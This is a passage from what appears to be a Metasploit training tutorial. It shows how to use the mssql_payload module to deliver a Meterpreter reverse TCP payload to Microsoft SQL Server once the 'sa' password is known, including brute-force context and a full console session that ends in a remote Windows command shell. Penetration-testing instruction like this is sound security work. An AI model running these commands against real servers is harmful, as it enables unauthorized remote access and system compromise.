Notification:  

Add   Edit   Delete   Sort   Print   Change Password   Settings   Permissions

In the prior section you saw the basics of creating a module, I wanted to show you this module to get an understanding of what we're about to build. This module allows you to quickly deliver Metasploit based payloads through Microsoft SQL servers. The current code works with 2000, 2005, and 2008. These next few sections will first walk you through how to use this attack vector, and start you from scratch on rebuilding how I was able to write this payload (and after HDM cleaned up my code).

Let's first take a look at how the exploit works. If you read through the Fast-Track section already, you would notice that something similar happens within Fast-Track as well. When an administrator first installs SQL Server 2000, 2005, or 2008, if they specify mixed authentication or SQL based authentication, they have to specify a password for the notorious "sa" account. The "sa" account is the systems administrator account for SQL based servers and has a ton of permissions on the system itself. If you can somehow guess the password of "sa", you can then leverage attack vectors through Metasploit to perform additional attacks. If you looked at some of the prior chapters, you saw how to discovery SQL servers through UDP port 1434 as well as perform dictionary-based brute force attacks against IP Addresses in order to guess the SQL "sa" account.

From here on out, we will assume that you already know the password for the MSSQL server and that you are ready to deliver your payload to the underlying operating system and not use Fast-Track.

Let's launch the attack:

____________
< metasploit ------------
\ ,__,
\ (oo)____
(__) )\
||--|| *

=[ metasploit v3.4-dev [core:3.4 api:1.0]
+ -- --=[ 453 exploits - 218 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
=[ svn r7690 updated today (2009.12.04)

msf > use windows/mssql/mssql_payload
msf exploit(mssql_payload) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST 10.10.1.103
LHOST => 10.10.1.103
msf exploit(mssql_payload) > set RHOST 172.16.153.129
RHOST => 172.16.153.129
msf exploit(mssql_payload) > set LPORT 8080
LPORT => 8080
msf exploit(mssql_payload) > set MSSQL_PASS ihazpassword
MSSQL_PASS => ihazpassword
msf exploit(mssql_payload) > exploit

[*] Started reverse handler on port 8080
[*] Warning: This module will leave QiRYOlUK.exe in the SQL Server %TEMP% directory
[*] Writing the debug.com loader to the disk...
[*] Converting the debug script to an executable...
[*] Uploading the payload, please be patient...
[*] Converting the encoded payload...
[*] Executing the payload...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (10.10.1.103:8080 -> 10.10.1.103:47384)

meterpreter > execute -f cmd.exe -i
Process 3740 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>